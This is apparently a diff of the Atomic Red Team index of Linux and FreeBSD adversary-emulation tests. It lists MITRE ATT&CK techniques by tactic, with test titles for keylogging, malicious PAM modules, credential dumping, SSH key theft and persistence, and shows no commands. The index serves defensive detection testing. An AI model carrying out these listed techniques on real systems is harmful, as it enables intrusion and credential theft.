||||
@@ -216,31 +257,36 @@
|
||||
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
|
||||
- Atomic Test #1: Cron - Replace crontab with referenced file [freebsd, macos, linux]
|
||||
- Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos]
|
||||
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
|
||||
- Atomic Test #3: Cron - Add script to /etc/cron.d folder [linux]
|
||||
- Atomic Test #4: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
|
||||
- T1505.002 Server Software Component: Transport Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1176 Browser Extensions](../../T1176/T1176.md)
|
||||
- Atomic Test #1: Chrome/Chromium (Developer Mode) [freebsd, linux, windows, macos]
|
||||
- Atomic Test #2: Chrome/Chromium (Chrome Web Store) [freebsd, linux, windows, macos]
|
||||
- Atomic Test #3: Firefox [freebsd, linux, windows, macos]
|
||||
- Atomic Test #1: Chrome/Chromium (Developer Mode) [linux, windows, macos]
|
||||
- Atomic Test #2: Chrome/Chromium (Chrome Web Store) [linux, windows, macos]
|
||||
- Atomic Test #3: Firefox [linux, windows, macos]
|
||||
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1505.003 Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md)
|
||||
- Atomic Test #1: Trap EXIT [macos, linux]
|
||||
- Atomic Test #2: Trap EXIT (freebsd) [linux]
|
||||
- Atomic Test #3: Trap SIGINT [macos, linux]
|
||||
- Atomic Test #4: Trap SIGINT (freebsd) [linux]
|
||||
- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
|
||||
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
|
||||
- Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
|
||||
- [T1136.001 Create Account: Local Account](../../T1136.001/T1136.001.md)
|
||||
- Atomic Test #1: Create a user account on a Linux system [linux]
|
||||
- Atomic Test #2: Create a user account on a FreeBSD system [linux]
|
||||
- Atomic Test #6: Create a new user in Linux with `root` UID and GID. [linux]
|
||||
- Atomic Test #7: Create a new user in FreeBSD with `root` GID. [linux]
|
||||
- T1053.001 At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md)
|
||||
- Atomic Test #1: Modify SSH Authorized Keys [freebsd, macos, linux]
|
||||
- Atomic Test #1: Modify SSH Authorized Keys [linux, macos]
|
||||
- T1215 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1136.002 Create Account: Domain Account](../../T1136.002/T1136.002.md)
|
||||
- Atomic Test #4: Active Directory Create Admin Account [linux]
|
||||
@@ -264,8 +310,9 @@
|
||||
- [T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md)
|
||||
- Atomic Test #1: Add command to .bash_profile [macos, linux]
|
||||
- Atomic Test #2: Add command to .bashrc [macos, linux]
|
||||
- Atomic Test #4: Append to the system shell profile [freebsd, linux]
|
||||
- Atomic Test #5: Append commands user shell profile [freebsd, linux]
|
||||
- Atomic Test #3: Add command to .shrc [linux]
|
||||
- Atomic Test #4: Append to the system shell profile [linux]
|
||||
- Atomic Test #5: Append commands user shell profile [linux]
|
||||
- Atomic Test #6: System shell profile scripts [linux]
|
||||
- Atomic Test #7: Create/Append to .bash_logout [linux]
|
||||
- T1168 Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -278,24 +325,31 @@
|
||||
- [T1037.004 Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md)
|
||||
- Atomic Test #2: rc.common [linux]
|
||||
- Atomic Test #3: rc.local [linux]
|
||||
- Atomic Test #4: rc.local (FreeBSD) [linux]
|
||||
- [T1543.002 Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md)
|
||||
- Atomic Test #1: Create Systemd Service [linux]
|
||||
- Atomic Test #2: Create SysV Service [linux]
|
||||
- Atomic Test #3: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux]
|
||||
- T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
|
||||
- Atomic Test #2: At - Schedule a job [linux]
|
||||
- Atomic Test #3: At - Schedule a job freebsd [linux]
|
||||
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
|
||||
- Atomic Test #8: Create local account (Linux) [linux]
|
||||
- Atomic Test #9: Create local account (FreeBSD) [linux]
|
||||
- Atomic Test #10: Reactivate a locked/expired account (Linux) [linux]
|
||||
- Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux]
|
||||
- Atomic Test #12: Login as nobody (Linux) [linux]
|
||||
- Atomic Test #13: Login as nobody (freebsd) [linux]
|
||||
|
||||
# command-and-control
|
||||
- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1132.001 Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md)
|
||||
- Atomic Test #1: Base64 Encoded data. [macos, linux]
|
||||
- Atomic Test #2: Base64 Encoded data (freebsd) [linux]
|
||||
- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1071.004 Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1172 Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -324,9 +378,10 @@
|
||||
- T1102.003 One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1090.003 Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md)
|
||||
- Atomic Test #3: Tor Proxy Usage - Debian/Ubuntu [linux]
|
||||
- Atomic Test #5: Tor Proxy Usage - FreeBSD [linux]
|
||||
- T1001 Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1571 Non-Standard Port](../../T1571/T1571.md)
|
||||
- Atomic Test #2: Testing usage of uncommonly used port [freebsd, linux, macos]
|
||||
- Atomic Test #2: Testing usage of uncommonly used port [linux, macos]
|
||||
- T1573 Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -337,20 +392,20 @@
|
||||
- T1132 Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1071.001 Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md)
|
||||
- Atomic Test #3: Malicious User Agents - Nix [freebsd, linux, macos]
|
||||
- Atomic Test #3: Malicious User Agents - Nix [linux, macos]
|
||||
- [T1105 Ingress Tool Transfer](../../T1105/T1105.md)
|
||||
- Atomic Test #1: rsync remote file copy (push) [freebsd, linux, macos]
|
||||
- Atomic Test #2: rsync remote file copy (pull) [freebsd, linux, macos]
|
||||
- Atomic Test #3: scp remote file copy (push) [freebsd, linux, macos]
|
||||
- Atomic Test #4: scp remote file copy (pull) [freebsd, linux, macos]
|
||||
- Atomic Test #5: sftp remote file copy (push) [freebsd, linux, macos]
|
||||
- Atomic Test #6: sftp remote file copy (pull) [freebsd, linux, macos]
|
||||
- Atomic Test #14: whois file download [freebsd, linux, macos]
|
||||
- Atomic Test #1: rsync remote file copy (push) [linux, macos]
|
||||
- Atomic Test #2: rsync remote file copy (pull) [linux, macos]
|
||||
- Atomic Test #3: scp remote file copy (push) [linux, macos]
|
||||
- Atomic Test #4: scp remote file copy (pull) [linux, macos]
|
||||
- Atomic Test #5: sftp remote file copy (push) [linux, macos]
|
||||
- Atomic Test #6: sftp remote file copy (pull) [linux, macos]
|
||||
- Atomic Test #14: whois file download [linux, macos]
|
||||
- Atomic Test #27: Linux Download File and Run [linux]
|
||||
- T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1090.001 Proxy: Internal Proxy](../../T1090.001/T1090.001.md)
|
||||
- Atomic Test #1: Connection Proxy [freebsd, macos, linux]
|
||||
- Atomic Test #1: Connection Proxy [linux, macos]
|
||||
- T1094 Custom Command and Control Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1102.001 Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1001.001 Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -359,18 +414,21 @@
|
||||
# collection
|
||||
- [T1560.001 Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md)
|
||||
- Atomic Test #5: Data Compressed - nix - zip [linux, macos]
|
||||
- Atomic Test #6: Data Compressed - nix - gzip Single File [freebsd, linux, macos]
|
||||
- Atomic Test #7: Data Compressed - nix - tar Folder or File [freebsd, linux, macos]
|
||||
- Atomic Test #8: Data Encrypted with zip and gpg symmetric [freebsd, macos, linux]
|
||||
- Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos]
|
||||
- Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos]
|
||||
- Atomic Test #8: Data Encrypted with zip and gpg symmetric [linux, macos]
|
||||
- Atomic Test #9: Encrypts collected data with AES-256 and Base64 [linux, macos]
|
||||
- [T1113 Screen Capture](../../T1113/T1113.md)
|
||||
- Atomic Test #3: X Windows Capture [linux]
|
||||
- Atomic Test #4: X Windows Capture (freebsd) [linux]
|
||||
- Atomic Test #5: Capture Linux Desktop using Import Tool [linux]
|
||||
- Atomic Test #6: Capture Linux Desktop using Import Tool (freebsd) [linux]
|
||||
- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md)
|
||||
- Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
|
||||
- Atomic Test #3: Logging bash history to syslog [linux]
|
||||
- Atomic Test #5: Bash session based keylogger [freebsd, linux]
|
||||
- Atomic Test #4: Logging sh history to syslog/messages [linux]
|
||||
- Atomic Test #5: Bash session based keylogger [linux]
|
||||
- Atomic Test #6: SSHD PAM keylogger [linux]
|
||||
- Atomic Test #7: Auditd keylogger [linux]
|
||||
- T1123 Audio Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -379,16 +437,17 @@
|
||||
- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1074.001 Data Staged: Local Data Staging](../../T1074.001/T1074.001.md)
|
||||
- Atomic Test #2: Stage data from Discovery.sh [linux, macos]
|
||||
- Atomic Test #3: Stage data from Discovery.sh (freebsd) [linux]
|
||||
- T1119 Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1115 Clipboard Data](../../T1115/T1115.md)
|
||||
- Atomic Test #5: Add or copy content to clipboard with xClip [linux]
|
||||
- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1005 Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1560.002 Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md)
|
||||
- Atomic Test #1: Compressing data using GZip in Python (FreeBSD/Linux) [freebsd, linux]
|
||||
- Atomic Test #2: Compressing data using bz2 in Python (FreeBSD/Linux) [freebsd, linux]
|
||||
- Atomic Test #3: Compressing data using zipfile in Python (FreeBSD/Linux) [freebsd, linux]
|
||||
- Atomic Test #4: Compressing data using tarfile in Python (FreeBSD/Linux) [freebsd, linux]
|
||||
- Atomic Test #1: Compressing data using GZip in Python (FreeBSD/Linux) [linux]
|
||||
- Atomic Test #2: Compressing data using bz2 in Python (FreeBSD/Linux) [linux]
|
||||
- Atomic Test #3: Compressing data using zipfile in Python (FreeBSD/Linux) [linux]
|
||||
- Atomic Test #4: Compressing data using tarfile in Python (FreeBSD/Linux) [linux]
|
||||
- T1560 Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -421,13 +480,17 @@
|
||||
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
|
||||
- Atomic Test #1: Sudo usage [macos, linux]
|
||||
- Atomic Test #2: Sudo usage (freebsd) [linux]
|
||||
- Atomic Test #3: Unlimited sudo cache timeout [macos, linux]
|
||||
- Atomic Test #4: Unlimited sudo cache timeout (freebsd) [linux]
|
||||
- Atomic Test #5: Disable tty_tickets for sudo caching [macos, linux]
|
||||
- Atomic Test #6: Disable tty_tickets for sudo caching (freebsd) [linux]
|
||||
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1206 Sudo Caching [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
|
||||
- Atomic Test #1: Cron - Replace crontab with referenced file [freebsd, macos, linux]
|
||||
- Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos]
|
||||
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
|
||||
- Atomic Test #3: Cron - Add script to /etc/cron.d folder [linux]
|
||||
- Atomic Test #4: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
|
||||
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1055 Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -435,7 +498,9 @@
|
||||
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md)
|
||||
- Atomic Test #1: Trap EXIT [macos, linux]
|
||||
- Atomic Test #2: Trap EXIT (freebsd) [linux]
|
||||
- Atomic Test #3: Trap SIGINT [macos, linux]
|
||||
- Atomic Test #4: Trap SIGINT (freebsd) [linux]
|
||||
- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
|
||||
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
|
||||
- Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
|
||||
@@ -443,12 +508,15 @@
|
||||
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md)
|
||||
- Atomic Test #1: Make and modify binary from C source [macos, linux]
|
||||
- Atomic Test #2: Make and modify binary from C source (freebsd) [linux]
|
||||
- Atomic Test #3: Set a SetUID flag on file [macos, linux]
|
||||
- Atomic Test #4: Set a SetUID flag on file (freebsd) [linux]
|
||||
- Atomic Test #5: Set a SetGID flag on file [macos, linux]
|
||||
- Atomic Test #6: Set a SetGID flag on file (freebsd) [linux]
|
||||
- Atomic Test #7: Make and modify capabilities of a binary [linux]
|
||||
- Atomic Test #8: Provide the SetUID capability to a file [linux]
|
||||
- Atomic Test #9: Do reconnaissance for files that have the setuid bit set [freebsd, linux]
|
||||
- Atomic Test #10: Do reconnaissance for files that have the setgid bit set [freebsd, linux]
|
||||
- Atomic Test #9: Do reconnaissance for files that have the setuid bit set [linux]
|
||||
- Atomic Test #10: Do reconnaissance for files that have the setgid bit set [linux]
|
||||
- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1169 Sudo [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md)
|
||||
@@ -464,8 +532,9 @@
|
||||
- [T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md)
|
||||
- Atomic Test #1: Add command to .bash_profile [macos, linux]
|
||||
- Atomic Test #2: Add command to .bashrc [macos, linux]
|
||||
- Atomic Test #4: Append to the system shell profile [freebsd, linux]
|
||||
- Atomic Test #5: Append commands user shell profile [freebsd, linux]
|
||||
- Atomic Test #3: Add command to .shrc [linux]
|
||||
- Atomic Test #4: Append to the system shell profile [linux]
|
||||
- Atomic Test #5: Append commands user shell profile [linux]
|
||||
- Atomic Test #6: System shell profile scripts [linux]
|
||||
- Atomic Test #7: Create/Append to .bash_logout [linux]
|
||||
- T1166 Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -476,43 +545,56 @@
|
||||
- [T1037.004 Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md)
|
||||
- Atomic Test #2: rc.common [linux]
|
||||
- Atomic Test #3: rc.local [linux]
|
||||
- Atomic Test #4: rc.local (FreeBSD) [linux]
|
||||
- [T1543.002 Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md)
|
||||
- Atomic Test #1: Create Systemd Service [linux]
|
||||
- Atomic Test #2: Create SysV Service [linux]
|
||||
- Atomic Test #3: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux]
|
||||
- T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
|
||||
- Atomic Test #2: At - Schedule a job [linux]
|
||||
- Atomic Test #3: At - Schedule a job freebsd [linux]
|
||||
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
|
||||
- Atomic Test #8: Create local account (Linux) [linux]
|
||||
- Atomic Test #9: Create local account (FreeBSD) [linux]
|
||||
- Atomic Test #10: Reactivate a locked/expired account (Linux) [linux]
|
||||
- Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux]
|
||||
- Atomic Test #12: Login as nobody (Linux) [linux]
|
||||
- Atomic Test #13: Login as nobody (freebsd) [linux]
|
||||
|
||||
# credential-access
|
||||
- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
|
||||
- Atomic Test #1: Malicious PAM rule [linux]
|
||||
- Atomic Test #2: Malicious PAM rule (freebsd) [linux]
|
||||
- Atomic Test #3: Malicious PAM module [linux]
|
||||
- [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md)
|
||||
- Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
|
||||
- Atomic Test #3: Logging bash history to syslog [linux]
|
||||
- Atomic Test #5: Bash session based keylogger [freebsd, linux]
|
||||
- Atomic Test #4: Logging sh history to syslog/messages [linux]
|
||||
- Atomic Test #5: Bash session based keylogger [linux]
|
||||
- Atomic Test #6: SSHD PAM keylogger [linux]
|
||||
- Atomic Test #7: Auditd keylogger [linux]
|
||||
- [T1110.001 Brute Force: Password Guessing](../../T1110.001/T1110.001.md)
|
||||
- Atomic Test #5: SUDO Brute Force - Debian [linux]
|
||||
- Atomic Test #6: SUDO Brute Force - Redhat [linux]
|
||||
- Atomic Test #7: SUDO Brute Force - FreeBSD [linux]
|
||||
- T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1110.002 Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1003.007 OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md)
|
||||
- Atomic Test #1: Dump individual process memory with sh (Local) [linux]
|
||||
- Atomic Test #3: Dump individual process memory with Python (Local) [freebsd, linux]
|
||||
- Atomic Test #2: Dump individual process memory with sh on FreeBSD (Local) [linux]
|
||||
- Atomic Test #3: Dump individual process memory with Python (Local) [linux]
|
||||
- Atomic Test #4: Capture Passwords with MimiPenguin [linux]
|
||||
- T1555.005 Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1040 Network Sniffing](../../T1040/T1040.md)
|
||||
- Atomic Test #1: Packet Capture Linux using tshark or tcpdump [linux]
|
||||
- Atomic Test #2: Packet Capture FreeBSD using tshark or tcpdump [linux]
|
||||
- Atomic Test #10: Packet Capture FreeBSD using /dev/bpfN with sudo [linux]
|
||||
- Atomic Test #11: Filtered Packet Capture FreeBSD using /dev/bpfN with sudo [linux]
|
||||
- Atomic Test #12: Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo [linux]
|
||||
- Atomic Test #13: Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo [linux]
|
||||
- Atomic Test #14: Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo [linux]
|
||||
@@ -528,19 +610,23 @@
|
||||
- Atomic Test #9: LaZagne.py - Dump Credentials from Firefox Browser [linux]
|
||||
- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1552.004 Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md)
|
||||
- Atomic Test #2: Discover Private SSH Keys [freebsd, macos, linux]
|
||||
- Atomic Test #2: Discover Private SSH Keys [linux, macos]
|
||||
- Atomic Test #3: Copy Private SSH Keys with CP [linux]
|
||||
- Atomic Test #4: Copy Private SSH Keys with CP (freebsd) [linux]
|
||||
- Atomic Test #5: Copy Private SSH Keys with rsync [macos, linux]
|
||||
- Atomic Test #6: Copy Private SSH Keys with rsync (freebsd) [linux]
|
||||
- Atomic Test #7: Copy the users GnuPG directory with rsync [macos, linux]
|
||||
- Atomic Test #8: Copy the users GnuPG directory with rsync (freebsd) [linux]
|
||||
- T1110.003 Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1649 Steal or Forge Authentication Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1552.003 Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md)
|
||||
- Atomic Test #1: Search Through Bash History [linux, macos]
|
||||
- Atomic Test #2: Search Through sh History [linux]
|
||||
- [T1552.001 Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md)
|
||||
- Atomic Test #1: Find AWS credentials [freebsd, macos, linux]
|
||||
- Atomic Test #3: Extract passwords with grep [freebsd, macos, linux]
|
||||
- Atomic Test #6: Find and Access Github Credentials [freebsd, macos, linux]
|
||||
- Atomic Test #1: Find AWS credentials [macos, linux]
|
||||
- Atomic Test #3: Extract passwords with grep [linux, macos]
|
||||
- Atomic Test #6: Find and Access Github Credentials [linux, macos]
|
||||
- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1621 Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -549,95 +635,112 @@
|
||||
- T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1110.004 Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md)
|
||||
- Atomic Test #1: SSH Credential Stuffing From Linux [linux]
|
||||
- Atomic Test #3: SSH Credential Stuffing From FreeBSD [linux]
|
||||
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1081 Credentials in Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1003.008 OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow](../../T1003.008/T1003.008.md)
|
||||
- Atomic Test #1: Access /etc/shadow (Local) [linux]
|
||||
- Atomic Test #3: Access /etc/passwd (Local) [freebsd, linux]
|
||||
- Atomic Test #4: Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat [freebsd, linux]
|
||||
- Atomic Test #5: Access /etc/{shadow,passwd,master.passwd} with shell builtins [freebsd, linux]
|
||||
- Atomic Test #2: Access /etc/master.passwd (Local) [linux]
|
||||
- Atomic Test #3: Access /etc/passwd (Local) [linux]
|
||||
- Atomic Test #4: Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat [linux]
|
||||
- Atomic Test #5: Access /etc/{shadow,passwd,master.passwd} with shell builtins [linux]
|
||||
- T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
|
||||
# discovery
|
||||
- [T1033 System Owner/User Discovery](../../T1033/T1033.md)
|
||||
- Atomic Test #2: System Owner/User Discovery [freebsd, linux, macos]
|
||||
- Atomic Test #2: System Owner/User Discovery [linux, macos]
|
||||
- T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1652 Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1087.002 Account Discovery: Domain Account](../../T1087.002/T1087.002.md)
|
||||
